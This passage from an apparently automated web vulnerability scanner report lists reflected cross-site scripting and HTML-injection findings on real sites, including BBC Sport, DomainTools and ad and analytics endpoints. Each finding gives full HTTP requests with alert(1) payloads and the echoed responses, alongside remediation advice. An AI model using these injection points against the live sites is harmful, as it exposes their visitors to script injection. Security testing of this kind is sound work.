Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm?afea3'-alert(1)-'0f35a49d629=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=761
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 49288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'afea3'-alert(1)-'0f35a49d629=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.151. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5709f'-alert(1)-'96343706a0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm?5709f'-alert(1)-'96343706a0b=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:34 GMT
Keep-Alive: timeout=5, max=793
Expires: Mon, 18 Jul 2011 02:20:34 GMT
Connection: close
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955634000,
       editionToServe: 'international',
       queryString: '5709f'-alert(1)-'96343706a0b=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.152. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3339d'-alert(1)-'a2a06505956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm?3339d'-alert(1)-'a2a06505956=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:41 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:19:41 GMT
Connection: close
Content-Length: 51951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955581000,
       editionToServe: 'international',
       queryString: '3339d'-alert(1)-'a2a06505956=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.153. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3d9'-alert(1)-'2c218cf9b1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm?5b3d9'-alert(1)-'2c218cf9b1c=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:08 GMT
Keep-Alive: timeout=5, max=741
Expires: Mon, 18 Jul 2011 02:20:08 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955608000,
       editionToServe: 'international',
       queryString: '5b3d9'-alert(1)-'2c218cf9b1c=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.154. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0774'-alert(1)-'96258bdb8b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm?b0774'-alert(1)-'96258bdb8b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:11 GMT
Keep-Alive: timeout=5, max=799
Expires: Mon, 18 Jul 2011 02:20:11 GMT
Connection: close
Content-Length: 53360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955611000,
       editionToServe: 'international',
       queryString: 'b0774'-alert(1)-'96258bdb8b3=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.155. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3db0'-alert(1)-'d49f53f3de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm?b3db0'-alert(1)-'d49f53f3de4=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:22 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:22 GMT
Connection: close
Content-Length: 48890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955622000,
       editionToServe: 'international',
       queryString: 'b3db0'-alert(1)-'d49f53f3de4=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2d9a3<script>alert(1)</script>a43c9ebe968 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5022490&plc=65247669&sid=953455&num=5&ver=2&dv_url=http%3A//www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/&callback=__verify_callback_3801895873712d9a3<script>alert(1)</script>a43c9ebe968 HTTP/1.1
Host: rtb0.doubleverify.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 18 Jul 2011 19:12:13 GMT
Content-Length: 74

__verify_callback_3801895873712d9a3<script>alert(1)</script>a43c9ebe968(2)

3.157. http://s49.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s49.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b6f'%3balert(1)//a1bad805d9 was submitted in the site parameter. This input was echoed as 95b6f';alert(1)//a1bad805d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s49redmondpie95b6f'%3balert(1)//a1bad805d9 HTTP/1.1
Host: s49.sitemeter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Jul 2011 19:10:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 18 Jul 2011 19:20:45 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ddEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s49redmondpie95b6f';alert(1)//a1bad805d9', 's49.sitemeter.com', '');

var g_sLastCodeName = 's49redmondpie95b6f';alert(1)//a1bad805d9';
// ]]>
...[SNIP]...

3.158. https://secure.domaintools.com/join/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5126"><a>5636737d81b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joind5126"><a>5636737d81b/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=joind5126"><a>5636737d81b">
...[SNIP]...

3.159. https://secure.domaintools.com/join/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2231d<a>d37eab15273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /join2231d<a>d37eab15273/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:18:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>d37eab15273">Whois record for "join2231d<a>d37eab15273"</a>
...[SNIP]...

3.160. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92168"><a>6a3fe2a15c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in92168"><a>6a3fe2a15c7/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=log-in92168"><a>6a3fe2a15c7">
...[SNIP]...

3.161. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d261<a>85e8fbdd7f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in6d261<a>85e8fbdd7f2/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>85e8fbdd7f2">Whois record for "log-in6d261<a>85e8fbdd7f2"</a>
...[SNIP]...

3.162. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98306"><a>183c19664cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shopping-cart98306"><a>183c19664cb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=shopping-cart98306"><a>183c19664cb">
...[SNIP]...

3.163. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7922<a>15d716d7dbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f7922<a>15d716d7dbb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>15d716d7dbb">Whois record for "f7922<a>15d716d7dbb"</a>
...[SNIP]...

3.164. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload ab504<script>alert(1)</script>dbf1c364134 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1310993870949-319721&mboxPC=1310569554435-90226.17&mboxPage=1310994092251-573687&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=3&user.profile=B2C&entity.id=5635&entity.categoryId=Phone%2CPhone%3AAllPhonesAndDevices&ContractPeriod=2Yr&entity.name=HTC%20Trophy%26amp%3Btrade%3B&entity.type=PDA%2FSmartPhones&entity.make=HTC&entity.model=Trophy%26amp%3Btrade%3B&entity.pageURL=%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26amp%3Baction%3DviewPhoneDetail%26amp%3BselectedPhoneId%3D5635&entity.thumbnailURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fphones%2Fmini%2Fhtc_trophy.png&entity.capabilities_96=false&entity.capabilities_147=false&entity.capabilities_150=true&entity.capabilities_193=false&entity.capabilities_194=false&entity.capabilities_198=false&entity.inventory=3435&entity.preorder=false&entity.ratings=4.6209&entity.reviews=306&entity.ratingURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fshared%2Freviews%2Fsm_star_4_5.png&path=phoneFirst&loggedin=false&planId=0&mbox=productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134&mboxId=0&mboxTime=1310976102252&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=39 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: mboxPC=1310569554435-90226.17; mboxSession=1310993870949-319721

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1310569554435-90226.17; Domain=verizonwireless.tt.omtrdc.net; Expires=Mon, 01-Aug-2011 13:03:24 GMT; Path=/m2/verizonwireless
Content-Type: text/javascript
Content-Length: 220
Date: Mon, 18 Jul 2011 13:03:24 GMT
Server: Test & Target

mboxFactories.get('default').get('productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1310569554435-90226.17");

3.165. http://whos.amung.us/psrvwidget/ [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://whos.amung.us
Path:   /psrvwidget/

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 4307b<script>alert(1)</script>fa525da0628 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /psrvwidget/?k=8gre&i=13f4342f4307b<script>alert(1)</script>fa525da0628&z=25414880 HTTP/1.1
Host: whos.amung.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: uid=CgH9C04khVAgVG3PetcqAg==

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:18:58 GMT
Content-Type: text/javascript
Connection: close
Server: Apache/1.1 (Windows 4.00.950)
Content-Length: 271

wau_populate_widget('13f4342f4307b<script>alert(1)</script>fa525da0628','<a href="http://whos.amung.us/pro/stats/8gre"><img src="+++://whos.amung.us***/pjswidget/:::&w=classic" class="wau_classic"bord
...[SNIP]...

3.166. http://whos.amung.us/psrvwidget/ [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://whos.amung.us
Path:   /psrvwidget/

Issue detail

The value of the k request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928fd"><script>alert(1)</script>cfcf9b0c40d was submitted in the k parameter. This input was echoed as 928fd\"><script>alert(1)</script>cfcf9b0c40d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /psrvwidget/?k=8gre928fd"><script>alert(1)</script>cfcf9b0c40d&i=13f4342f&z=25414880 HTTP/1.1
Host: whos.amung.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: uid=CgH9C04khVAgVG3PetcqAg==

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:18:58 GMT
Content-Type: text/javascript
Connection: close
Server: Apache/1.1 (Windows 4.00.950)
Content-Length: 274

wau_populate_widget('13f4342f','<a href="http://whos.amung.us/pro/stats/8gre928fd\"><script>alert(1)</script>cfcf9b0c40d"><img src="+++://whos.amung.us***/pjswidget/:::&w=classic" class="wau_classic"b
...[SNIP]...

3.167. http://lookupserver.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lookupserver.com
Path:   /

Issue detail

